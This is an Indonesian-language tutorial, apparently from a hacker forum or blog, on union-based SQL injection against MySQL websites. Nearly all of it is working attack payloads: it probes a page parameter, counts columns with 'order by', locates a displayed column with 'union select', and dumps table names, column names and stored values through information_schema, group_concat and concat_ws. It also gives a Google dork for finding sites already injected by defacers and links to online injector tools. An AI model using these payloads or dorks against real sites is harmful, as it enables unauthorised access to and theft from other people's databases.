Yang perlu di ketahui sebelum sql injection pada mysql: karakter: ' atau - comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
=========== [+]step Satu:= ===========
carilah target misal: [site]/berita.php?id=100
Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error. contoh: [site]/berita.php?id=100' atau [site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
========== [+]step Dua:= ==========
mencari dan menghitung jumlah table yang ada dalam databasenya... gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau [site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)... misal: [site]/berita.php?id=-100+order+by+1-- [site]/berita.php?id=-100+order+by+2-- [site]/berita.php?id=-100+order+by+3-- [site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error... misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8 menjadi [site]/berita.php?id=-100+order+by+8--
=========== [+]step Tiga:= ===========
untuk mengeluarkan angka berapa yang muncul gunakan perintah union karena tadi error sampai angka 9 maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
============ [+]step Empat:= ============
untuk menampilkan table yg ada pada web tsb adalah perintah table_name >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
untuk menampilkan semua isi dari table tsb adalah perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
yang keluar udah pasti ada pesan error (lumayan buat lu tester/belajar)...
dork yang ini beda lagi tapi masih tetep sama kea yang diatas, neh halaman yang pernah diinject defacer sebelumnya, lu tulis keyword neh di google
allinurl:group_concat(table_name)+from+information_schema.tables disitu lu langsung dapet table yang di butuhin buat inject..
masih soal dork.. neh ada tools utk memudahkan lu mencari web yang bisa di inject.. http://ike.co.id/kagami.php
nah buat inject lu bisa pake tools online tapi ga semua web bisa.. maklum robot kan kadang oon juga xixixixixii...
kalo lu mau coba tools online lu bisa coba yang di sini http://tools.kerinci.net/?x=injector tetapi sebelumna lu harus cari dulu halaman web yang ada vurln'a sebelum menggunakan tool ntu..